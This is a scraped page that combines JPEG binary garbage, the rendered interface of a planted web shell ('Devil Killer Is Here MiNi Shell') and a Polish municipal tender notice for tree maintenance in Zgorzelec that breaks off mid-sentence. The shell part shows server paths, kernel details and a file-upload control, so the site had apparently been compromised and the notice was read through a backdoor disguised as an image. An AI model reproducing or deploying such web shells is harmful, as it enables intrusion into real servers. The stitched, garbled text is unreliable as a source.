JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20220225/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20220225/0006879801-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Utrzymanie w należytym stanie zadrzewień na terenie Gminy Miejskiej Zgorzelec </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miejska Zgorzelec</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">GM Zgorzelec</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 230821546</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Domańskiego 7</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zgorzelec</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">59-900</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL515 - Jeleniogórski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad@zgorzelec.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://bip.um-zgorzelec.dolnyslask.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Utrzymanie w należytym stanie zadrzewień na terenie Gminy Miejskiej Zgorzelec </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-66c9516a-9637-11ec-9bc1-c2db95d08897</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00068798</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-02-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00019397/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Usługi pielęgnacji zieleni</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/zgorzelec <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/zgorzelec</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Postępowanie prowadzone jest w języku polskim w formie elektronicznej za pośrednictwem platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/zgorzelec <br/>2.W celu skrócenia czasu udzielenia odpowiedzi na pytania preferuje się, aby komunikacja między zamawiającym a wykonawcami w zakresie, o którym mowa w Rozdziale XIII SWZ, odbywa się za pośrednictwem platformazakupowa.pl i formularza „Wyślij wiadomość do zamawiającego”, z uwzględnieniem zapisów Rozdziału XIV SWZ. Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za pośrednictwem platformazakupowa.pl poprzez kliknięcie przycisku „Wyślij wiadomość do zamawiającego” po których pojawi się komunikat, że wiadomość została wysłana do zamawiającego.<br/>3.Zamawiający i Wykonawcy mogą również komunikować się za pomocą poczty elektronicznej:1)Wykonawca na adres e-mail Zamawiającego: k.zagrodnik@zgorzelec.eu2)Zamawiający za pośrednictwem służbowej poczty e-mail osoby uprawnionej do komunikowania się z Wykonawcą: k.zagrodnik@zgorzelec.eu – na adres e-mail Wykonawcy.4.Zamawiający, zgodnie z § 11 ust. 2 ROZPORZĄDZENIA PREZESA RADY MINISTRÓW z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie zamieszcza wymagania dotyczące specyfikacji połączenia, formatu przesyłanych danych oraz szyfrowania i oznaczania czasu przekazania i odbioru danych za pośrednictwem platformazakupowa.pl, tj.:1)stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,2)komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,3)zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10.0,4)włączona obsługa JavaScript,5)zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,6)szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3, 7)Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.5.Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:1)akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej pod linkiem w zakładce „Regulamin&#34; oraz uznaje go za wiążący,2)zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod linkiem. <br/>6.Zamawiający nie przewiduje sposobu komunikowania się z wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej.7.Oferta powinna być:1)Sporządzona w języku polskim,2)złożona przy użyciu środków komunikacji elektronicznej tzn. za pośrednictwem platformazakupowa.pl,<br/>3)podpisana kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym przez osobę/osobyupoważnioną/upoważnione.8.Rozszerzenia plików wykorzystywanych przez Wykonawców powinny być zgodne z Załącznikiem nr 2 do “Rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych”.9.Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .docx .xls .xlsx .jpg (.jpeg) ze szczególnym wskazaniem na .pdf10.W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów (rozszerzeń):<br/>a).zip b).7Z11.Wśród formatów (rozszerzeń) powszechnych a niewystępujących w Rozporządzeniu KRI występują: .rar .gif .bmp .numbers .pages. Dokumenty złożone w takich plikach zostaną uznane za złożone nieskutecznie.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego <br/>i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony <br/>osób fizycznych w związku z przetwarzaniem danych osobowych i w <br/>sprawie swobodnego przepływu takich danych oraz uchylenia <br/>dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE <br/>L119 z dnia 4 maja 2016 r., str. 1; zwanym dalej „RODO”) <br/>informujemy, że:<br/>1) administratorem Pani/Pana danych osobowych jest Urząd Miasta <br/>Zgorzelec.<br/>2) administrator wyznaczył Inspektora Danych Osobowych, z którym <br/>można się kontaktować pod adresem e-mail: iodo@zgorzelec.eu<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 <br/>ust. 1 lit. c RODO w celu związanym z przedmiotowym <br/>postępowaniem o udzielenie zamówienia publicznego, <br/>prowadzonym w trybie podstawowym, zgodnie z art. 275 pkt 1 <br/>ustawy Pzp.<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub <br/>podmioty, którym udostępniona zostanie dokumentacja <br/>postępowania w oparciu o art. 18 i art. 74 ustawy Pzp.<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 <br/>ust. 1 ustawy Pzp przez okres 4 lat od dnia zakończenia <br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania <br/>umowy przekracza 4 lata, okres przechowywania obejmuje cały <br/>czas trwania umowy.<br/>6) obowiązek podania przez Panią/Pana danych osobowych <br/>bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym <br/>Nr postępowania: WZP.271.1.2.2022<br/>Strona 41 z 80<br/>określonym w przepisach ustawy Pzp, związanym z udziałem <br/>w postępowaniu o udzielenie zamówienia publicznego.<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą <br/>podejmowane w sposób zautomatyzowany, stosownie do art. 22 <br/>RODO.<br/>8) posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych <br/>osobowych Pani/Pana dotyczących;<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana <br/>danych osobowych (skorzystanie z prawa do sprostowania nie <br/>może skutkować zmianą wyniku postępowania o udzielenie <br/>zamówienia publicznego ani zmianą postanowień umowy <br/>w zakresie niezgodnym z ustawą PZP oraz nie może naruszać <br/>integralności protokołu oraz jego załączników);<br/>c) na podstawie art. 18 RODO prawo żądania od administratora <br/>ograniczenia przetwarzania danych osobowych z <br/>zastrzeżeniem okresu trwania postępowania o udzielenie <br/>zamówienia publicznego lub konkursu oraz przypadków, <br/>o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia <br/>przetwarzania nie ma zastosowania w odniesieniu do <br/>przechowywania, w celu zapewnienia korzystania ze środków <br/>ochrony prawnej lub w celu ochrony praw innej osoby fizycznej <br/>lub prawnej, lub z uwagi na ważne względy interesu <br/>publicznego Unii Europejskiej lub państwa członkowskiego );<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony <br/>Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie <br/>danych osobowych Pani/Pana dotyczących narusza przepisy <br/>RODO; <br/>9) nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do <br/>usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa <br/>w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec <br/>przetwarzania danych osobowych, gdyż podstawą prawną <br/>przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 <br/>lit. c RODO; <br/>10) przysługuje Pani/Panu prawo wniesienia skargi do organu <br/>nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana <br/>Nr postępowania: WZP.271.1.2.2022<br/>Strona 42 z 80<br/>danych osobowych przez administratora. Organem właściwym <br/>dla przedmiotowej skargi jest Urząd Ochrony Danych <br/>Osobowych, <br/>ul. Stawki 2, 00-193 Warszawa.<br/>11) Jednocześnie Miasto Zgorzelec przypomina o ciążącym na <br/>Pani/Panu obowiązku informacyjnym wynikającym z art. 14 <br/>RODO względem osób fizycznych, których dane przekazane <br/>zostaną Zamawiającemu w związku z prowadzonym <br/>postępowaniem i które Zamawiający pośrednio pozyska od <br/>Wykonawcy biorącego udział w postępowaniu, chyba że ma <br/>zastosowanie co najmniej jedno z wyłączeń, o których mowa <br/>w art. 14 ust. 5 RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WZP.271.1.2.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 260629,44 PLN </span> </h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 210630,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Opis przedmiotu zamówienia: <br/>1) Zakres przedmiotu zamówienia obejmuje:<br/>a) cięcia pielęgnacyjne drzew, <br/>b) cięcia techniczne drzew, <br/>c) usuwanie odrostów drzew, <br/>d) usuwanie drzew, <br/>e) usuwanie karp drzew, <br/>f) frezowanie karp drzew, <br/>g) cięcia pielęgnacyjne krzewów, <br/>h) cięcia żywopłotów, <br/>i) usuwanie krzewów, <br/>j) awaryjne usuwanie wiatrołomów, <br/>k) nasadzenie drzew, <br/>l) nasadzenie krzewów,<br/>m) przesadzenie drzew,<br/>n) montaż wiązań elastycznych, <br/>o) wykonywanie operatów dendrologicznych, <br/>p) bezpłatne doradztwo w zakresie planowanych nasadzeń, <br/>q) uzupełnienie nawierzchni chodników po usuniętych drzewach,<br/>r) rozbieranie nawierzchni chodników pod nowe nasadzenia. <br/>2) Szczegółowy zakres przedmiotu zamówienia związanego z <br/>utrzymaniem drzewostanu, technologią robót i opisem wymagań <br/>jakościowych został zawarty w Załączniku nr 6 do SWZ. <br/>3) Szacunkowe ilości drzew i krzewów planowanych do przycięcia i <br/>wycięcia zostały zawarte w Załączniku nr 7 do SWZ. <br/>2. Wykonawca będzie zobowiązany do realizacji przedmiotu umowy <br/>stanowiącej załącznik nr 5 do SWZ, sukcesywnie według potrzeb <br/>Zamawiającego , na podstawie pisemnych zleceń, przekazanych <br/>przez Zamawiającego w formie pisemnej, zawierających w <br/>szczególności rodzaj oraz zakres prac do wykonania. Zamawiający <br/>dostarczy Wykonawcy zlecenia w formie elektronicznej, które <br/>będzie zobowiązywało Wykonawcę do rozpoczęcia prac.<br/>3. Wykonawca w ramach nabytej wiedzy i doświadczenia, we <br/>własnym zakresie dopasuje odpowiednie wiązania elastyc zne do <br/>drzew, zapewniając jednocześnie prawidłowość ich zastosowania. <br/>Po dokonaniu montażu wykonawca zobowiązany będzie dostarczyć <br/>Zamawiającemu odpowiednie atesty lub certyfikaty zastosowanych <br/>wiązań. <br/>4. Wykonawca zobowiązany będzie do wycinki drzew i krze wów <br/>owocowych. Drzewa i krzewy owocowe będą mogły być wycięte po <br/>dokonaniu wizji w terenie w obecności pracownika Wydziału <br/>Infrastruktury Urzędu Miasta Zgorzelec, podczas których podjęta <br/>zostanie decyzja o konieczności ich usunięcia. Pozostałe drzewa i <br/>krzewy będą mogły być wycinane tylko i wyłącznie po uzyskaniu <br/>przez Zamawiającego zezwolenia od Starosty Zgorzeleckiego lub <br/>Wojewódzkiego Konserwatora Zabytków we Wrocławiu, zgodnie z <br/>zapisami ustawy z dnia 16 kwietnia 2004r. o ochronie przyrody .<br/>5. Miejsca nasadzeń i przesadzeń drzew i krzewów zostaną wskazane <br/>przez pracownika Wydziału Infrastruktur y Urzędu Miasta <br/>Zgorzelec zgodnie z posiadaną dokumentacją lub innymi <br/>uzgodnieniami. <br/>6. W przypadku wystąpienia wiatrołomów Wykonawca zobowiązany <br/>będzie do ich usunięcia – całodobowo, również w dni wolne od <br/>pracy. Wykonawca zobowiązany jest do przystąpienia do prac w <br/>ciągu 4 godzin od chwili zgłoszenia. <br/>W przypadku wystąpienia wiatrołomów w pasie drogowym oraz <br/>innych terenach w sytuacji zagrożenia bezpieczeństwa zdrowia, <br/>życia i mienia Wykonawca zobowiązany jest do ich usunięcia –<br/>całodobowo, również w dni wolne od pracy w ciągu 2 godzin od <br/>otrzymania zgłoszenia od Zamawiającego.<br/>Zgłoszenie Wykonawcy faktu o wystąpieniu wiatrołom ów nastąpi <br/>pocztą elektroniczną.<br/>7. Zobowiązuje się Wykonawcę do udzielenia pisemnych odpowiedzi <br/>na zarzuty, skargi i zapytania kierowane do Zamawiającego od <br/>mieszkańców, mediów i organizacji ekologicznych, dotyczących <br/>prawidłowości wykonywanych usług. Odpowiedzi na zapytania <br/>Wykonawca zobowiązany będzie udzielić w terminie trzech dni <br/>roboczych od przesłania pocztą elektroniczną przez<br/>Zamawiającego. <br/>8. Wykonawca zobowiązany będzie do przeprowadzenia oględzin i <br/>sporządzania pisemnych opinii w zakresie stanu fitosanitarnego <br/>drzew, wnioskowanych do wycinki przez mieszkańców miasta. <br/>Opinia będzie zawierała informację dotyczącą zasadności wniosku <br/>lub braku podstaw do usunięcia danego drzewa. Wykonawca <br/>będzie wykonywał przeglądy minimum dwa razy w miesiącu lub na <br/>każde żądanie Zamawiającego na podstawie przesłanego zlecenia <br/>do Wykonawcy pocztą elektroniczną. Wykonawca dostarczy opinie <br/>do Urzędu Miasta Zgorzelec w terminie trzech dni od otrzymania <br/>wykazu drzew wytypowanych do przeglądu. Wykonaną <br/>dokumentację Wykonawca zobowiązany jest przekazać <br/>Zamawiającemu w formie elektronicznej.<br/>9. Przedmiot zamówienia obejmuje również sprzątanie, usuwanie <br/>gałęzi oraz pni drzew. Wykonawca ma obowiązek utrzymać teren <br/>prac w stanie wolnym od przeszkód, a zbędne przedmioty usuwać <br/>z miejsca wykonywanych prac.<br/>10. Podczas prowadzenia wszystkich prac związanych z przedmiotem <br/>zamówienia, zobowiązuje się Wykonawcę do sporządzania <br/>dokumentacji fotograficznej. Dokumentacja fotograficzna powinna <br/>być wykonywana na każdym etapie prowadzenia prac tj.: przed <br/>rozpoczęciem, w trakcie oraz po ich zakończeniu. Wykonaną <br/>dokumentację Wykonawca zobowiązany jest przekazać <br/>Zamawiającemu w formie elektronicznej (np. na nośniku CD) lub w <br/>formie papierowej, z chwilą podpisania protokołu odbioru <br/>poszczególnych zleceń. <br/>11. Wykonawca ponosi pełną odpowiedzialność za utrzymanie <br/>oznakowania i zabezpieczenia prac prowadzonych w pasach <br/>drogowych dróg publicznych w trakcie ich wykonywania, w tym <br/>również wykonanie na swój koszt i we własnym zakresie projektów <br/>zabezpieczenia robót wraz ze wszystkimi koniecznymi <br/>uzgodnieniami i zgłoszeniami. Projekty zabezpieczenia robót <br/>powinny zostać wykonane zgodnie z § 5 ust. 1 i 2 Rozporządzenia <br/>Ministra Infrastruktury z dnia 23 września 2003r. w sprawie <br/>szczegółowych warunków zarządzania ruchem na drogach oraz <br/>wykonywaniu nadzoru nad tym zarządzaniem. Podczas <br/>prowadzenia prac na drogach zaliczonych do kategorii innej niż <br/>gminna, Wykonawca zobowiązany jest uzyskać we własnym <br/>zakresie od odpowiedniego zarządcy drogi zezwolenie na zajęcie <br/>pasa ruchu drogowego. Wykonawca poniesie ewentualne koszty z <br/>tytułu jego zajęcia. <br/>12. Wykonawca zobowiązany jest usuwać i składować odpady <br/>powstałe przy realizacji przedmiotu zamówienia w sposób <br/>określony w załączniku Nr 6 do SWZ – Technologia robót. <br/>Wykonawca jako wytwórca odpadów jest zobowiązany do <br/>przestrzegania przepisów wynikających z ustawy z dnia 27 <br/>kwietnia 2001r. Prawo ochrony środowiska oraz ustawy z dnia 14 <br/>grudnia 2012r. o odpadach. <br/>13. Wykonawca będzie odpowiadać za wszelkie skutki spowodowane <br/>przez jego działania lub zaniechania w szczególności obejmujące <br/>uszkodzenia własności publicznej i osób trzecich.<br/>15. Wykonawca zobowiązany jest zapewnić we własnym zakresie i na <br/>własny koszt przez cały okres realizacji przedmiotu zamówienia <br/>osoby posiadające stosowne kwalifikacje zawodowe i uprawnienia <br/>wymagane przepisami obowiązującego prawa, tj.:<br/>1) 2 osoby posiadające uprawnienia do obsługi pilarek <br/>spalinowych zgodnie z Rozporządzeniem Ministra Środowiska z <br/>dnia 24 sierpnia 2006 r. w sprawie bezpieczeństwa i higieny <br/>pracy przy wykonywaniu niektórych prac z zakresu gospodar ki <br/>leśnej uprawniających do realizacji przedmiotu zamówienia. <br/>2) minimum 1 osobę, która odbyła europejski kurs (w kraju <br/>członkowskim UE) na kwalifikowanego pracownika w zakresie <br/>pielęgnacji drzew i posiada certyfikat jego ukończenia – np. kurs <br/>European treeworkera. <br/>- Uwaga! Wykonawca przed podpisaniem umowy na <br/>realizację przedmiotowego zamówienia będzie <br/>zobowiązany do przedłożenia ww. certyfikatu <br/>Zamawiającemu.<br/>3) minimum 1 osobę do kierowania pracami przy zabytkach <br/>będącymi parkami, która ukończyła studia drugiego stopnia lub <br/>jednolite studia magisterskie, których program obejmował <br/>zajęcia lub grupy zajęć umożliwiające nabycie wiedzy i <br/>umiejętności w tym zakresie oraz która po rozpoczęciu studiów <br/>drugiego stopnia lub po zaliczeniu szóstego semestru jednoli tych <br/>studiów magisterskich, przez co najmniej 9 miesięcy brała udział <br/>w pracach konserwatorskich lub pracach restauratorskich <br/>prowadzonych przy tego rodzaju zabytkach wpisanych do <br/>rejestru, lub była zatrudniona przy tych pracach w muzeum <br/>będącym instytucją kultury zgodnie z art. 37b ustawy z dnia 23 <br/>lipca 2003r. o ochronie zabytków i opiece nad zabytkami.<br/>4) minimum 1 osobę do wykonywania prac w charakterze <br/>technicznym, która posiada świadectwo ukończenia szkoły <br/>średniej zawodowej oraz tytuł zawodowy lub wykształcenie <br/>średnie i 